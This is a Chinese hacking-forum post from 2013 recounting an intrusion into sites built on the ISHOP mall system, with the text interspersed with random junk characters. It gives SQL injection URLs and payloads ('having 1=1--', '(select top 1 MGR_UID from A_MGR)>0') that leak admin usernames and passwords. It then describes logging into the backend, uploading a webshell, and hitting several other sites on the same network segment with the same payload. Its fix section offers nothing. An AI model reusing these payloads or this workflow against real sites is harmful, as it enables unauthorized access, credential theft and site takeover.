找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1992|回复: 0
打印 上一主题 下一主题

ISHOP商场建站系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 17:40:38 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
发现一个注入点1 K7 E; i) d# C" ]' T* i3 h& ~
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI20120506105833892 A! C1 R+ q+ B( C/ S. o" e1 j
6 f& b( W" U2 q, _+ Z
习惯性的加’having1=1--
0 R! y; ~& T: g% W3 c* w' b/ J7 U8 C, z, o: E
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—% D' Z& ]2 x8 x; q- h5 D3 I

/ }0 X7 z8 f# j( u0 y0
: }: }8 g  V, D9 R8 Z+ S. b* i' Q
爆出Diary_A.dl_Title(这时候很激动啊)
0 C0 l3 r7 b$ \1 \$ [+ C: \7 Y0 ?9 ^, V# ]* Q9 f3 a1 J
那么继续
- V8 u* H" ?& c* D- M  n, ]: Khttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—3 [& E6 U. t9 Q  d

& d, g/ l$ X+ f! G  S, g继续,一直爆下去3 u+ d. [5 D: W; |+ j3 ?. U

8 V, P( j) R; n! k9 o7 }5 [6 X4 ]爆到几个字段和表段 但是没找到需要的管理用户的字段
$ ^5 `' x' s% g, C0 E) }: P- d( W8 O- m* n1 `
蛋疼了 怎么办 然后去后台登陆页看源码
# E( F- [1 B2 Y  K9 N* R5 z" a* q! D+ T+ \
0# p, K/ j, R  q! F8 r+ o

' L6 a. ]9 h# I+ xInput name= “ADUID”
6 s9 I1 [% v4 S& d: Q0 [- qInput name= “ADPWD”
, {4 G2 [6 q( v2 x" P3 a( D
% N3 q/ r+ D0 }) D( H$ W3 \很幸运 找到了字段那就继续/ x) Z; M& `$ h& b- \6 O
找到之后开始爆用户4 G- Z3 Q0 s7 _: \# k2 h0 ?# L/ \
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—) j! A4 m9 [8 E/ ?0 @& x
爆密码
. ^* l) A2 u0 e  F& f: |$ h; I/ Ghttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
6 c3 X4 x$ E( @; K5 A测试了下 这个注入点只能爆到文章哪里的表
7 ], v; Y! j! n' }! |4 d9 k) S9 o! \) X
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了; a! N+ |- f2 m

: o9 {4 ^+ o4 ^5 O9 k/ J! B又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了# G) Y$ A" i9 b/ f. p
9 K% l, b$ N0 d% M* `4 Q
473
" X0 `! E! a! I* d9 ~! h$ C
- f: K) ?+ a& M$ W" u进后台" f0 v+ K$ D" r( d
& ?% E# j  z9 d
  f" d$ h2 I& A* W" z7 i- N
发现几个上传点 有的地方不能上传 而且防止恶意代码3 i' o' v3 }% r6 y& E! v. Z6 s
6 B! h9 n/ K' r5 p6 }% v1 E
没办法 各种百度各种找大牛 找到一只好像可以突破的马
' T* ^7 V- A; F5 L  A% ]/ l1 C( S0 e% ]) \

) n" |* a0 H! |3 X1 E5 P在系统管理那里直接上传 不过没有显示地址4 L) ~/ i* c1 g7 M4 [

+ l: g2 b, ^: _' q5 s再上传一次 抓包 搞定OK* O( V5 j" j- c$ A/ k" i+ M

9 f$ Z+ d# X2 M- Y2 {" G) B: U7 M4 J4 l* o. r/ v
: f: a; ?3 W- S0 t
472  V& r  ^2 o+ n( e

8 B8 H: U# t9 t3 i7 ]晚上不行了 去睡觉。。。+ p; {: Q. F) y" o2 {- ^8 B1 {
第二天刚起床 闲的没事做继续日站吧
. c  p% k# V3 S0 j7 ^+ D5 n$ R' U! k! g# U1 ?4 C
找个站 就把这个站的旁c扫了下
; H! ]1 Q+ C/ [# O  f$ W2 h5 ]0 \! D# w% y
发现c段也有一个购物站 ,然后还和这个站的模板差不多3 a0 ~& m3 u+ ?/ Z$ a  P4 V
4 T0 E& G2 @6 Y: g3 C9 R: Q% M: ?
就找到会员登录口测试
6 w) W1 G5 w3 S' p' S$ W' m% B/ S. ]- h& e* u& W+ O
'and (select top 1 MGR_UID from A_MGR)>0—+ |* @# V. i7 [1 f
果断爆到了 这时候我很激动 通杀
" Z& z6 z% q" E8 L) M
2 X9 q2 D9 w% j/ ?/ D8 w/ T再次翻c段) B" ~$ {9 ~, z) e1 f# Q3 N
" R3 l8 v& i! J6 y
翻出几个站 都成功拿下
" ^+ h- o& J( h, P, S4 b' |
+ T4 _4 {1 ]& c! V" |
' r. |  M4 q9 t  V, N" [5 a2 U' }
修复方案:7 ?: N- }( Z7 M' t8 z- l5 }
他们比我专业
- Q3 A# f% Y. ^$ ^  ~* u3 X5 b* k1 k9 D1 j8 f

& S, D# K7 z  L6 y1 }8 |! @) u( M5 J8 }8 T( E( R
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表